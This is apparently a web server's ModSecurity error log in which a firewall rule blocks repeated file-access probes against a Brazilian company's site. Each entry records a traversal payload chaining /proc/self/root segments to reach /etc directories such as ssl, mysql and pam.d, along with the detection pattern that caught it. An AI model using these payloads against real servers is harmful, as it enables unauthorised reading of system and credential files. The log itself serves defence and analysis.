"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnpeyqAr6etmhZHNq7uQAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:55.935125 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:51670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnp-yqAr6etmhZHNq7vwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:57.287284 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:45436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnqeoXxyEfFpUF8f9qHAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:58.625242 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:45438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnqvu8EFLIOrSqIpsApAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:24:59.883576 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:45454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnq9a6ubjKNq_cu4aVkwAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:01.151217 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:45468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnrQkwaGbbGflqUZAMTwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:03.435741 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:45472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnrwkwaGbbGflqUZAMUgAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:05.263232 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:45482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnsfu8EFLIOrSqIpsApgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:06.958873 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:45488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnsuoXxyEfFpUF8f9qLwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:08.221533 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:38586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqntPu8EFLIOrSqIpsAqQAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:09.510999 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:38602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqntda6ubjKNq_cu4aVlwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:09.964011 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:45096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnteoXxyEfFpUF8f9qMgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:10.835389 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:38618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqntgkwaGbbGflqUZAMVQAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:12.455839 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:38634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnuCmAPhZkrhU8w4lo3QAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:14.219339 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:38638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnutY0UrI5A3LftIyjLgAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:15.600054 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:38650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnu-yqAr6etmhZHNq7wwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:16.434985 2026] [:error] [pid 30077:tid 140411590858496] [client 216.73.216.191:1183] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnvPu8EFLIOrSqIpsAswAAAlI"]
[Wed Mar 18 10:25:16.459109 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:46214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnvNa6ubjKNq_cu4aVnwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:25:17.035063 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:38656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnveyqAr6etmhZHNq7xAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:18.440335 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:48140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnvsdf6f5d65gmYZTR5gAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:19.800241 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:48148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnv-oXxyEfFpUF8f9qOQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:21.119303 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:48158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnwda6ubjKNq_cu4aVowAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:25:22.413505 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:48168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqnwsdf6f5d65gmYZTR7wAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
